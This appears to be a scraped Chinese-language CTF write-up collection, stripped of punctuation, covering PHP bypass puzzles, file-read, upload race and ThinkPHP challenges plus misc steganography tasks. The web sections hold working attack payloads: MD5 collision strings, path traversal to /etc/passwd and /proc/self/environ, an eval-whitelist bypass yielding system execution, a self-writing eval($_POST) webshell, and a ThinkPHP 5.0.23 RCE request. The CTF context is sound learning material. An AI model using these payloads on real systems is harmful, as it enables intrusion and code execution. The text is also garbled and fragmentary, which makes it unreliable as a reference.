yunxi[]1wlgf[]2

yunxis878926199awlgfs155964671a

第二层存在强比较此处使用string限制参数为字符串型不能使用数组绕过。

可使用两个MD5值完全相同的字符绕过

yunxii%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2wlgff%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

第三层变量$GLG开头包含字符串

GLGhttp://blog.csdn.net127.0.0.1

第五层shell_exec()函数使页面无回显使用或tee命令将想要进行的命令执行存入1.txt文件之后再访问1.txt文件即可。

cmdcat

yunxis878926199awlgfs155964671ayunxii%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2wlgff%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2GLGhttp://blog.csdn.net127.0.0.1cmdcat

/flag

QNKCDZO0e830400451993494058024219903391

2406107080e462097431906509019562988736854

s878926199a0e545993274517709034328855841020

s155964671a0e342768416822451524974117254469

array1%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

array2%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

select

浏览器或其他客户端程序在请求时提供用户名和口令形式的身份凭证的一种登录验证方式。

即

http://www.xxx.comwww.yyy.com形式

shell_exec()函数

||如果前面的语句执行失败则执行后面的语句前面的语句只能为假。

两条命令都执行如果前面的语句为假则直接执行后面的语句前面的语句可真可假。

如果前面的语句为假则直接出错也不执行后面的语句前面的语句为真则两条命令都执行前面的语句只能为真。

小小py

/download?image../../etc/passwd//

etc/passwd

/download?image../../proc/self/environ//

proc/self

使用bp抓包爆一下页面设置数字从1到10000找到index8887.html的特殊界面

cvFXZohgjf.php代码审计

//检查$content的长度是否小于60如果大于等于60程序终止并显示不是哥们。

定义一个黑名单数组$blacklist

//使用正则表达式检查$content中是否包含黑名单中的字符如果包含程序终止并显示新号别搞。

foreach

($blacklist

定义一个白名单数组$whitelist包含了允许在$content中使用的数学函数名称

$whitelist

使用正则表达式从$content中提取所有函数名称存储在$used_funcs数组中。

preg_match_all(/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/,

$content,

使用正则表达式从$content中提取所有函数名称存储在$used_funcs数组中。

遍历$used_funcs检查其中的函数名是否都在$whitelist中如果不在程序终止并显示虾啊。

foreach

//使用eval函数将$content中的内容安全地执行并输出

二次传参RCE

?GS$_GET{};$_GET{0}($_GET{1})0system1ls//?GS$_GET{};

定义一个变量GS其值为一个空数组

尝试调用$_GET数组中的第一个元素作为函数并将第二个元素作为参数传递给它

//0system

for($k1;$ksizeof($payload);$k){for($i

0;$i

$i.$j;echo($payload[$k].^$i$j.$exp);echo

\n;}}

$GS(is_nan^(6).(4)).(tan^(1).(5))

_GET

正常来说可随意使用题中所给数学函数作为参数但是这里限制60的字符长度有三个字母的函数用了还是会超出

最终payload

?GS$pi(is_nan^(6).(4)).(tan^(1).(5));$pi$$pi;$pi{0}($pi{1})0system1cat

/flag//$pi$$pi;

variable将$pi的值即_GET作为变量名然后将_GET数组赋值给$pi。

随便传一个文件都是返回一张图片根据题目的speed可以猜测为文件上传的条件竞争。

?php

$opfopen(shell.php,a);fwrite($op,?php

eval($_POST[111]);?);fclose($op);echo(111)

不需要设置参数payload

两边同时爆破将文件上传路径页面回显111的页面发送到repeater改1.php为shell.php能访问成功

连接蚁剑得到flag

在上传文件源代码里面有校验上传的文件文件直接上传上传成功后才进行判断

如果文件格式符合的情况下则重命名如果文件格式不符合要求就将文件删除。

由于服务器并发处同时理多个请求假如a用户上传了一个文件b用户访问a用户的文件就会出现以下三种情况

1.访问时间点在上传文件之前没有此文件

$opfopen(shell.php,a);fwrite($op,?php

eval($_POST[111]);?);fclose($op);echo(333)

//fopen(...)打开或创建名为shell.php的文件并以写入模式fwrite进行操作。

//fputs(...)此函数将数据写入由fopen打开的文件。

数据是作为字符串提供的。

//?php

//输出数字111作为一种执行成功的标记。

真正的hackerflag1(flag2)

使用ThinkphpGUI工具扫描发现存在5.0.23版本的rce漏洞

GET传参?scaptchatest-1

POST传参_method__constructfilter[]systemmethodgetserver[REQUEST_METHOD]cat

/flag1

访问后给了一个提示“命令执行只能得到flag1真正的渗透大师热衷于getshell”说明flag2需要getshell才能得到。

选择漏洞版本后并不能直接getshell

故可利用一句话木马进行命令执行将一句话木马文件1.php上传到/var/www/public/uploads/路径下

echo

PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4

|base64

解压后打开PPT提示有6部分flag考点简单但是脑洞太大所以也说没有思路就不用硬耗时间

考点一盲水印

保存第二页的图片使用工具分析吾爱破解WaterMark下载得到flag1{hdy12-

考点二word隐藏文字

选中全文点击字体打开“字体”对话框。

在“字体”对话框中将“效果”栏下的【隐藏】取消勾选然后点击确定这样文档中隐藏的文字就全部取消隐藏状态并显示出来了。

得到flag2{1yhgzc5-

解压后使用010editor打开发现base64编码转为图片得到一个二维码

Base64转换图片工具

在音频文件里面写入了其它的文件比如flag.txt也可以是图片等等此时可以用deepsound进行解密。

将考点4.wav文件放入Deepsound解密提取1.txt文件得到

flag4{ghj8-

字典字典攻击的效率比爆破稍高因为字典中存储了常用的密码因此就避免了爆破时把时间浪费在无用的密码上。

掩码攻击如果已知密码的某几位如已知8位密码的第4位是Z那么可以构造XXXZXXXX进行掩码攻击掩码攻击的原理相当于构造了第4位为Z的字典攻击效率也比逐个尝试的爆破方式高。

考点六

使用010editor打开附件可看见一个明显的PK头但是被倒置了

with

Yunxi{hdy12-1yhgzc5-Ypt0a2-ghj8-7ugak-78uiag}

MISC1

flag{7823yed-3892hu-7euiwb-euwidbh82-7ueidw}

MISC2

取出4个字节并倒转顺序restored_data.extend(data[i:i4][::-1])#

open(output_file,

Again——CVE-2023-28303(截图修复)_windows10教育版激活密钥-CSDN博客

Crypto